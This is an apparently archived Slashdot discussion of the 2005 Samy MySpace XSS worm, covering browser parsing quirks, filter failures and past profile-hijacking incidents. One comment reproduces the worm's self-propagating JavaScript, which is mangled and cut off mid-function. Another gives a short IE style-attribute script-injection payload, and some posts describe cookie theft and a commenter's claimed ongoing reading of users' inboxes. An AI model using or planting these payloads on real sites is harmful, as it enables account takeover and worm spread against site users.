I asked her politely, and even suggested she setup some web space and just copy the image off my site so she can use it(without bandwidth concerns). In true passive-aggressive fashion, she ignored me.

So I changed the image filename to tubgirl.

By some amazing coincidence, she changed the image to something else a day later.

Re:With myspace popularity, comes the problems

[ptomblin]

The first time I noticed it happening, I wrote to the guy, and got back an extremely incoherent response. I think he was denying that he was doing anything wrong, but I couldn't be sure. So I did the redirect to my leech.png, and then I went back to his page a few days later and he's complaining that I hacked his web site, and he was changing all his passwords. But he was leeching somebody else's picture as his background.

I guess it's too much to expect a modern teenager to actually learn something from his experiences.

Re:With myspace popularity, comes the problems

sounds like someone is a bit pissy he did not get an orkut invite.

Wahh. with that attitude you will never get one.

Re:With myspace popularity, comes the problems

[blake213]

Use these greasemonkey scripts to get rid of all that crap.

Molester's

[Wedge1212]

My Space: For child Molesters and the children the molest! ...ala is anyone surprised?

You're kidding...

right? They're not just going to hire someone who figured out how to bypass a filter. That's not brilliant design by any means.

For further reading

[Hosiah]

Since I know only about 12 programming languages and use maybe 10 libraries between them all, that makes me next to computer illiterate these days. So I didn't know what XSS was, but found this site: http://www.cgisecurity.com/articles/xss-faq.shtml extremely informative. Including some HEX code that looks like fun!

This is *not* XSS

[brunes69]

This is, by deifnition, not a cross site scripting vulnerability, since all the requests were confined to the MySpace.com domain.

In fact, I don't see how anyone who even read the article could conclude that it was XSS. There isn't even a vulnerability in the browser being epxloited here, it is just vulnerabilities in the MySpace.com software.

XSS vulnerabilities are much worse than this. If this guy had tried to use XMLHttpRequest to access a site off of MySpace.com, he would find that all it would result in is raising a security exception. XSS vulnerabilities use holes in browsers to get around this, allowing data to flow from one website to another without the user's knowledge. That is dangerous.

Re:This is *not* XSS

And now for the nit-picking minute...

If you read the technical explanation of the worm, you will see (item 8) that he had to add an extra redirection go from profile.myspace.com to www.myspace.com.

The cross-site part is not the main part of the worm. But still...

Re:This is *not* XSS

Cross-site scripting attacks *do not* need to be between different sites or domains. They are poorly named, as one of the original researchers, Marc Slemko points out here: http://httpd.apache.org/info/css-security/

But cross-site scripting, as generally defined, definately encompasses this kind of bug.

Re:Day late, dollar short.

[nine-times]

agreed. The fact is, Slashdot is not a news source. They don't write their own articles or do their own investigations. It's a news aggregator paired with discussion forums.

By the very nature of being a news aggregator, it will never be the first place that a story appears. It will always be elsewhere on the net first, and someone will then notice it and submit it here. So ok, maybe you saw it somewhere else first. Maybe you got it from the original source. Good for you. Those who failed to happen upon the story elsewhere can still learn about it here, and even if you saw it someplace else first, you can still join in the discussion.

Disable JavaScript And Leave It Off

This bug would not occur were client-side JavaScript (or any other language) execution disabled.

Will developers ever understand that downloadable code can NEVER be secure?

Years ago developers who used mainframes with greenscreens (which have the capability of executable client-side code in some cases) concluded that security was impossible two decades ago; furthermore academicians have proven that secure downloadable code is impossible.

Today we have idiots re-creating the problem in a browser (a much more volatile and less secure environment) with JavaScript, AJAX and XMLHTTPRequest.

the turd of myspace

[5n3ak3rp1mp]

awhile back all my younger friends started bugging me to get a myspace profile. I took one look at the site, first thought was "crap design" (I'm a web/db dev), second thought was "superficial", closed window. I was just appalled at how bad it looked (despite still visiting Slashdot every day... hehe)

All I can surmise is that the person who designed this worm is far more clever than any of the people who designed MySpace.

I still don't have a profile on it...

Re:Day late, dollar short.

[Iriel]

I thank you and the others that agree with me on this. That and I get tired of the false cries of dupe (some are legit) when the story is really a follow-up or an update.

Put them out of work, or give them better skills

[benhocking]

Actually, I think that if IE became more strict it would require them to learn a little more about how HTML is designed to work. It should make them more employable, not less. Of course, this is similar to Nietzsche's "That which does not kill me, makes me stronger" and it's corrollary, "Yeah, but that which does kill me..."

D'oh!

[benhocking]

Well, yeah. Um, about that. You see, well, it oughta. It just oughta.

But seriously, I think there are other examples where IE does allow incorrect HTML, but now my credibility is just shot. :P

Re:Day late, dollar short.

[Mister+Transistor]

Heh... I think you have cause and effect reversed!

MySpace has always been insecure

[zootread]

I found a similar exploit (force people to add you) back when they were allowing Javascript in your profile. MySpace has always been really insecure, mainly because of their stupid design decision to allow users to use more than basic HTML. They allowed Javascript at first, thinking they'd be able to filter out anything malicious. They soon realized that was stupid and filtered out Javascript. Turns out there was a way to slip it in through CSS (granted only for IE). I'm not surprised.

Also, when they originally disabled Javascript, they didn't go through everyone's profile and re-filter it. So there are still people using Javascript hacks that just haven't updated their profile, so the hack remains in place. For example, there is a way to read someone's cookie and send it somewhere, thus making it possible to see who visits your profile (and maybe something more malicious).

Javascript in comments

[jurt1235]

That would be a good addition, maybe we could that run our own banners to promote your own favourable comments. Flamebaits/bad ratings would hurt earnings, and since (almost) everybody likes earnings, it would improve the quality of the comments to an unprecedented level.

My guess about the moderation on this comment in a javascript & graphics allowed comment environment: -1 (Redundant)

Doesn't work.

This doesn't work on slashdot.
Someone figured out to execute javascript in a div-tag in /.-posts some years ago (pop-up & goatse redirect on mouseover) about 2 (?) years ago but it was fixed veeeerry fast.

Not the first worm of that type

[TheLink]

Firstly it's on the same site :).

Advogato (mod_virgule) was vulnerable to this sort of thing before (back in 2002). Won't be surprised if there were others too.

Anyway, I've proposed years ago that there be HTML tags to turn off any active/dynamic stuff.

Currently the HTML situation is like only being able to turn off the lights by going to dozens of switches one by one and turning them off. There is no main power switch to turn ALL the lights off, or even groups of lights off.

I guess it's just me who thinks that the HTML equivalent of a "Big Red OFF" switch would be useful.

e.g.
<shieldson lock="randomstring" allowed="keyword,keyword,keyword" />
disallowed material disabled
<shieldsoff lock="randomstring"/>
state restored to before lock

Where keywords:
textonly = just text
basic = basic formatting <em> <b> <i> <strong>
tables = tables
urls= plain <a href=""> no javascript etc
images= plain images, no javascript etc.
java=java
javascript=javascript.

The idea is it will be very hard for the attacker to guess the random string.

Oh well...

Re:Not the first worm of that type

try <pre></pre>

About (2?) years ago

[lupid]

I did this. They were more lenient with the javascript back then. You had to use escape characters, but it was no big deal. I wrote a self-propagating worm that changed a user's name to the source of my script. Then I inserted that code into my name. Everyone on myspace had their name changed to 'lupidvirus' after about 6 hours. I got a call from their lawyers the next day at work.

Mine propagated faster than this one because it didn't rely on profile views. Anytime you saw the name, whether it be in a comment, profile, or search, you would be infected. However, with the script executing 100 times per page view, myspace's servers quickly became overloaded and crashed (I didn't really expect it to work). I also essentially staged a DDoS attack against my web server which was hosting the script (it needed to be hosted in order to fit in the 'name' field).

Another note: myspace never removed the scripts that were saved before they outlawed javascript. To this day, I can read a user's inbox and sent messages when they view my profile. I also was going to write a DHTML roleplaying game that ran on myspace, but they locked that account because of the virus. It still plays music and lets you manipulate your inventory though =D

Re:About (2?) years ago

To this day, I can read a user's inbox and sent messages when they view my profile.

Since myspace know who you are, do you really want to be admitting this in public? Still, what are the chances of them reading this article ... about myspace?

Developers just don't care

[LlamaGui]

About a year ago, I discovered a bug in xanga.com's software that would allow anyone to use any javascript they wanted. Xanga simply made 1 pass through to remove any tags... so all you had to do was write <script> and </script>. I created a proof of concept that would allow me to capture a user's cookies and send them to an offsite PHP script, totally transparent to the victim. You could then simply replace the victim's cookie with yours, and have total control of their account.

So I took my discovery and emailed it to their designated bug report address. 5 months later it was finally fixed. I've found other vunerabilities that would allow anyone to do the same thing, but I don't even want to bother writing a proof of concept and telling them about it. Most companies just don't see XSS as a danger until someone wreaks some havoc.

Re: XSS Comes Of Age

[EddyPearson]

Wow! Very clever! Before now (for me anyway) XSS has just been a "bug" rather than a "vulnerability" and apart from the odd phishing attack or sneaky password stealing i never really saw a practical appliance for it until now.

Oh, and just to get in the oblicatory M$ bashing session, who's fault was this entire thing?? MSIE!!! Owing to their clear disregard for HTML standards. MySpace (who never asked to be browsed by IE!) had to take their site offline because of the care-free people.

I leave you with this: If this is possible, what else is vulnerable to XSS+AJAX?

Just a question...

[strider44]

This guy used the tag to insert the javascript which slashdot also allows. Not that I'm wanting anyone to do something evil with it but I'm wondering could slashdot be susceptable to the same flaw they're reporting?

Re:Just a question...

[drew]

What he did wasn't particular to the div tag- he could have done it with any tag. Mainly he used the fact that IE a) allows javascript within style attributes, and b) interprets "java\nscript" the same as "javascript". So any site that allows you to post the following would be suceptible, no matter which individual tags they allow or disallow:

<b style="background: url('java
script:alert(1)');">pwned</b>

Prosecute?

[Evil+W1zard]

So is MySpace.com going to bring criminal charges against this individual for creating and propagating malcode? Outright it may have done no damage, but they may be able to claim damages caused from shutdown and cleanup...

Spoon

[debrain]

I believe it was called a spoon.

Look on the bright side!

[JonTurner]

>>I bet he doesn't have over 1 million friends now.

No kidding. But look on the bright side -- he has dramatically increased his chances of having at least one *very* close, long-term friend. Bubba, meet your new cellmail, "Samy."

The Cross Site Scripting FAQ

[webappsec]

Cross Site Scripting

Re:And the phrase for self-replicating viruses was

[Em7add11]

And the phrase for self-replicating viruses was "gossip". Unfortunately, the viruses would occasionally replicate with mutations, but this only made them stronger.

At my school, I think it was called "herpes".

The Moral is...

[gallwapa]

Use a NON IE Browser. I enjoy firefox myself. Infact, with firefox, i block all those crappy embedded music videos people have 2934234092 on their profiles

Evolution in Action

[Doc+Ruby]

After patching to fix this problem, MySpace now becomes the most immune to these types of attacks. Their software is more resistant, their team is more educated. To mix punchlines, pioneers get the arrows, but blows that do not break the back, strengthen it.

Re:Evolution in Action

No, they just wasted some of their time due to Microsoft incompetence. If I were them I simply report the bug to Microsoft and do nothing except block IE from the application.

When you patch a security problem by the way, you haven't gotten "stronger", you simply "failed". Security issues should never be put in software to begin with. No pioneers, no arrows. Just a system that takes in finite bytes strings and returns finite byte strings.

Re:Evolution in Action

[Doc+Ruby]

The last part of your message slips into unintelligibility. But the first part is worth responding to. It's obvious that all Internet apps have bugs, including security holes. Which get closed as they get exposed. Now MySpace has a competitive advantage against their competitors, because they are better equipped to deal with the next one, and that problem is no longer active in their system. Their competitors are not as experienced, so this worm can hit them, too.

You can't let your idea of a perfect Internet conflict with understanding the reality of the imperfect one we've got. You've got to accept that we're in an evolution scenario, where the stresses of the Internet select some systems more fit to survive, in both technical and business terms. Survivors are stronger than those untested, and business especially selects for known risks, rather than those untested. So while any individual security problem is unwelcome, we have to accept their reality. And look for actual differences in value among all of those exposed to them. MySpace, if they mutate to accomodate this environmental development, will be better suited to survive than their competitors. Which means "winner" in the evolution game.

This threat has been known about for ages.

[James+A.+Y.+Joyce]

I wrote a Kuro5hin article documenting exactly this sort of problem some time ago. It's about Xanga, but it applies just as much to MySpace.

There is no spoon!

Didn't you see The Matrix?

In jail...

[thrill12]

... everyone will be your friend. Really...

Kitty.

[RonaldReagan]

I feel embarassed for the guy's cat. I never saw his webpage, but I only assume he had pictures of his cat on there. That cat probably doesn't even want to be seen in public now.

And then he said...

[SethD]

"Get back foo! You're invading MySpace!"

LiveJournal Took up the Responsibility

[BobPaul]

LiveJournal's cleanhtml.pl already covers multiline splits in IE. It's not like IE's interpretation of single tags split on mutiple lines hasn't been known about for quite some time.

I completely agree that IE is the problem, but to say that this is something site administrators couldn't have been prepared for is untrue. To expect a self replicating javascript? No way. But to secure the filter to prevent multiline tags? Yes, cleanhtml.pl already does. It's known and out there already.

Re:LiveJournal Took up the Responsibility

[mdecarle]

Speaking of which, the LiveJournal infrastructure is a real gem! Brad did a good job building and maintaining that site. Have you ever seen those slideshows about the underlying infrastructure (servers, datalines, and such? cool.)

Of course, there's the occasional hiccup. (See also: Blackout Analysis)

IE... What?

[PickyH3D]

Thankfully, the script was written for fun and didn't try to take advantage of unpatched security holes in IE to create a massive MySpace botnet.

Luckily, DJ_Vegas has NO IDEA what he is talking about and simply wanted to take a shot at IE.

Re:Day late, dollar short.

[jschrod]

I would even say that the moderation works quite well. Just wait a few hours and read at +4 or +5. You will find well-balanced selection of comments, actually.

Re:Day late, dollar short.

Slashdot Mods smoke crack! News at 11

Parent is +5 Insightful, should be -1 Offtopic
This is why Slashdot has such high noise-to-signal.

Clever myspace user?!?

[bingo4000]

One clever MySpace user

Woudn't it be more accurate to say "THE clever MySpace user"?

Re:Day late, dollar short.

If /. sucks so much, why are you still here?

That's the problem: It sucks so much that I can't pull myself away. Plus, someone has got to keep spoonfeeding reality to some of you feebs.

My Hero

[Xytheril]

I can see it now that this sounds like the plot for a Sci Fi movie. Guy inserts code into Myspace. Myspace then becomes conscious and starts rampaging across the internet, trying to get people to be its friends. If they don't, it bombards them with pictures of slashed wrists. Then some B movie actors like Gary Busey and John Rhys Davies have to "go into the internet" using some kind of virtual reality rig and kill Myspace. I've already pitched the idea. It'll be debuting next year.

The consequences

would have been much more interesting on adultfriendfinder!

Not the first attack of this kind ...

[stevey]

The open source site Advogato was hit by a similar profile-page-virus in 2002.

But it was a neat hack, and kudos to Samy!

www.mrfixitonline.com 2001

[RedLaggedTeut]

There was a similar opportunity at http://www.mrfixititonline.com/ in 2001, since you could use javascript in your signatures. In their infinite wisdom, instead of fixing the hole, they made using signatures a subscription-only "gold" feature. Now that's a business model ;-)

You know you are a loser...

[br0pbr0p]

When you have to write a script to get friends...

Re:You know you are a loser...

With any luck, he can make plenty of friends in prison. Unfortunately it's doubtful he'll see any jail time even though he deserves it. Whatever his intent was, hacking the system is illegal.

It hasn't hit me...

[Landshark17]

...I've still only got 4 myspace friends. *sighs*

"Samy says his intentions weren't malicious"

Robert Tappan Morris might be able to suggest some good lawyers.

XSS

[leighklotz]

I wrote an XSS filter based on TagSoup and SAX filters.

The exploit itself

Taken from http://namb.la/popular/tech.html this is the exploit he used:

<div id=mycode style="BACKGROUND: url('java
script:eval(document.all.mycode.expr)')" expr="var B=String.fromCharCode(34);var A=String.fromCharCode(39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}cat ch(e){}if(C){return C}else{return eval('document.body.inne'+'rHTML')}}function getData(AU){M=getFromURL(AU,'friendID');L=getFromU RL(AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split('&');var AS=new Array();for(var O=0;O<F.length;O++){var I=F[O].split('=');AS[I[0]]=I[1]}return AS}var J;var AS=getQueryParams();var L=AS['Mytoken'];var M=AS['friendID'];if(location.hostname=='profile.my space.com'){document.location='http://www.myspace. com'+location.pathname+location.search}else{if(!M) {getData(g())}main()}function getClientFID(){return findIn(g(),'up_launchIC( '+A,A)}function nothing(){}function paramsToString(AV){var N=new String();var O=0;for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.repl ace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.repla ce('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ ,BH,true);if(BJ=='POST'){J.setRequestHeader('Conte nt-Type','application/x-www-form-urlencoded');J.se tRequestHeader('Content-Length',BK.length)}J.send( BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=fals e}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE= AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. <d'+'iv id='+AE+'D'+'IV>'}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes', '</td>');AG=AG.substring(61,AG.length);if(AG.index Of('samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']= 'Preview';AS['interest']=AG;J=getXMLObj();httpSend ('/index.cfm?fuseaction=profile.previewInterests&M ytoken='+AR,postHero,'POST',paramsToString(AS))}}} function postHero(){if(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']= 'Submit';AS['interest']=AG;AS['hash']=getHiddenPar ameter(AU,'hash');httpSend('/index.cfm?fuseaction= profile.processInterests&Mytoken='+AR,nothing,'POS T',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendI D='+AN+'&Mytoken='+L;J=getXMLObj();httpSend(BH,get Home,'GET');xmlhttp2=getXMLObj();httpSend2('/index .cfm?fuseaction=invite.addfriend_verify&friendID=1 1851658&Mytoken='+L,processxForm,'GET')}function processxForm(){if

You can run Javascript in myspace...

[r2tincan]

...if it's hidden in Flash.

How he did it

[Sheepdot]

From the horses's mouth:
http://namb.la/popular/tech.html

I added you to my foes list

[bxbaser]

1 million foes ....
everyones got to have a dream and mine starts now

What about Hex code?

What if you were to convert it all to hex? wouldn't the Browser then execute the code after it formatted it from hex?

One clever MySpace user

[Nom+du+Keyboard]

I hope he's One clever ex-MySpace user permanently.

Re:Day late, dollar short.

[JeremyALogan]

Did you stop to consider that /. IS slow? I read a few other news aggrigation sites every day and /. is almost universally a day or two behind the others. These aren't news sites I'm comparing it to here, but other aggrigators. It's gotten so that I read BoingBoing throughly and just scan /. to see what I missed. It's a problem of the editors not caring. Based on story submissions that several people I know and myself have gotten rejected only to see the same story a few days later I think they aren't fully checking the storys that come in. It seems to me like they're looking at the inbox saying "sheesh... 500 messages" reading maybe the first 50 and then just rejecting the others. Maybe after they see the same subject enough times they'll click it to see what's up. It's pretty clear that the editors don't care as much as they use to... just look at all the dupes we get.

Thank God

[Lisandro]

Thankfully, the script was written for fun and didn't try
to take advantage of unpatched security holes in IE to create a massive MySpace botnet.

    Yeah. That would've been a tragedy.

Tom

Tom did it first.

Re:Day late, dollar short.

Saw it a day ago on http://www.reddit.com/ .

Must...resist...cliche

[!emus]

In Soviet Russia, your heros choose you!

Ah well, 1 offtopic post as a new user already hosed my karma, this post probably won't be seen by anyone anyway.

*i* want them reading it

i don't even use myspace and i want myspace reading that comment. it's totally irresponsible that they bothered to disable javascript but didn't audit existing data for it. somebody claiming that in public with an identifiable name might get them off their asses.

it doesn't affect me for a variety of reasons, but the last thing anybody needs is another major security vulnerability for lots of people.

Deja vu...

Just reading the article brought back a flood of memories of when I used to be a hardcore user of the site AsianAvenue, where I did many of the same things mentioned in the article. I also found out how to insert raw HTML in my profile, and how to automatically have anyone who visited by page become a "friend", although it wasn't self-propogating. I also knew how to have people automatically sign my guestbook also...

Fun times.

HA

HA HA HA HA HA
/sorry
//thought this was fark

I think its fake

I think its fake. I use myspace A LOT. I probably browse 100+ profiles a day and I didnt get this worm, I have never even heard of it until a few days ago when I was linked to a page that the sammy guy wrote about it. I use IE, so all the scripting would have hit me and Ive never heard anyone on my buddy list bitching about it in a bulletin or some chain bulletin telling people to watch out for it. I see no proof behind it other than some guy saying he did it, and myspace being down for awhile. The thing is myspace is down all of the time, they have horrid backend code. I get random errors all the time and there is almost always atleast an hour of downtime every day.

myspace is too buggy...

myspace already has enough bugs in it, theres already several ways to get javascript working on that site. it just took a couple months for some guy willing enough to script somthing like this to figure that out, and i think its about time.

+1, Funny but -1, Wrong

[Atario]

code that infects your browswer

It does no such thing. It changes settings in a website. Assuming he's not using some actual exploit, and just doing the kind of thing he explains about (it's really an interesting read, I suggest you have a look), the "worst that could happen" would be that he gets you to spew a bunch of requests at his own site.

Re:+1, Funny but -1, Wrong

[Hosiah]

(it's really an interesting read, I suggest you have a look)

FTFA:
"The next step was to simply instruct the Web browser to load a MySpace URL that would automatically invite Samy as a friend"
???

Re:+1, Funny but -1, Wrong

through HttpRequest JavaScript object, which only works on the same website you are currently on

Re:+1, Funny but -1, Wrong

[Atario]

Right. Your browser pretends to do something you can do yourself by filling in a form or clicking a link or whatever. Then it's done. "Infect your browser" implies there's something changed about your browser, rather than just your MySpace settings.

Re:+1, Funny but -1, Wrong

[Hosiah]

"enslave your browser", then???

Paving material

[benhocking]

OK, I can somewhat defend the good intentions behind rendering poor html, but I'm going to have to go ahead and give you a rousing "Amen, brother!" on the FrontPage point.

Re:Paving material

[Bert64]

Rendering poor html had nothing to do with good intentions, it was purely an easier way of making netscape look bad than actually creating a better browser..
If no browsers rendered broken html, then no websites would be using broken html... Noone creates a website without testing it in atleast one browser before putting it online, and if none of the available browsers would tollerate errors then the quality of html code out there would be that much higher.

With lynx ?

[Gopal.V]

Whenever someone says something about viral-scripting - I just paste the link into lynx (or links) and view it.

Get your Samy T-shirt now

http://www.zazzle.com/products/gallery/browse_resu lts.asp?searching=on&searching_search_columns=*&se arching_search_condition=samy

Not feeling cynical enough lately

[benhocking]

I choose not to believe that. I don't credit anyone with that much foresight. I think that, as usual, MS was just catering to the lowest common denominator ("No one ever went broke or lost a campaign by overestimating the public's stupidity"), and the side "benefits" you mentioned just happened by chance (well, not exactly chance, but you know what I mean). Sure, you can blame them for contributing to the glut of poorly written HTML, on at least two different levels, but I refuse to believe that their choice to render poor html was part of some vast Microsoft-wing conspiracy. ;)

Re:Not feeling cynical enough lately

[Bert64]

What reason could they possibly have other than to discredit netscape?
It`s not as if there was already a large amount of poorly formed html floating around.. Because no browser at the time would render poorly formed html, people never deployed anything like that...
If a browser maker released a browser today which was intentionally tollerable of bad html then you could claim it was doing so for convenience so it would display the thousands of badly formed sites out there, but back when microsoft made the decision to make IE tollerable of html errors, there simply weren't any sites out there that needed it..
But by producing a browser that tollerated poor html, microsoft ensured a greater chance of such sites being created..
Microsoft correctly assumed that the majority of end users would see a site display in ie and not in netscape, and assume that netscape was broken/inferior... And a lot of end users creating such sites, would simply not bother making it work in the "broken" netscape browser..

Just a thought...

[Jennasaurus]

Ok, i understand that he did this for laughs and all, i commend him for this only because it shows he is probably the only Myspace user on the network that would be able to pull this off, or else somebody else would have allready! But yet, why cause mischief and have a network have to go offline? yet i think if i was smart enough to pull this off i probably would have done the same!^_^ i mean im just starting out and learning about HTML and CSS! But also... it really peeves me that some of the articles said all of the networks users became a victem of this and other articles said a certain amount! Not all users and/or profile were affected by this! My profile was fine and was never took offline. But still kudos to "samy" for his achievements, i'm just a little baffled on a few things having to do with this!

MySpace worm wasn't first

[kristaps.kaupe]

Actually, this wasn't "first self-propagating cross-site scripting (XSS) worm". This was second. First was written three months ago by Latvian hacker Lethal for Latvian Friendster-alike website Draugiem.lv. That worm was called Draugberts.

Re:Day late, dollar short.

[SillyNickName4me]

Actually, securityfocus links to the slashdot article as 'news'. Usually that is the other way around.. so I guess in this case Slashdot was not that slow, and actually managed to post something that 'matters'. :)